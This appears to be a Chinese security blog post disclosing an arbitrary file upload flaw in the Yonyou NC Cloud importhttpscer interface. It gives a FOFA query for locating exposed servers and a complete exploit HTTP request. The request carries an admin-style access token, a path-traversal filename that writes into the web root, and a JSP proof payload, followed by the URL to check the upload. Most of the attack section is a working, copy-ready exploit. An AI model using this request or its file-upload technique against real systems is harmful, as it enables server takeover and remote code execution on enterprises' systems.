用友NC Cloud importhttpscer接口存在任意文件上传漏洞

本文介绍了用友NCCloud基于云计算的企业管理软件,其存在的任意文件上传漏洞可能导致服务器控制权限被攻击者获取。漏洞允许通过POST请求上传恶意文件并执行代码,威胁企业信息安全。

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

用友NC Cloud 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。同时,用友NC Cloud 还支持多终端访问,适应各种不同的设备和工作场景,方便用户灵活办公和协作。

用友NC Cloud importhttpscer接口存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器控制权限。

资产搜索

fofa:

app="用友-NC-Cloud"

漏洞复现

POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Length: 233
Connection: close
Content-Type: multipart/form-data; boundary=uof6bcdvrhdkozsvbs3p
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Accept-Encoding: gzip, deflate

--uof6bcdvrhdkozsvbs3p
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/cs.jsp"

<%out.println(11*11);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--uof6bcdvrhdkozsvbs3p--

上传成功后,访问

http://127.0.0.1/cs.jsp

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值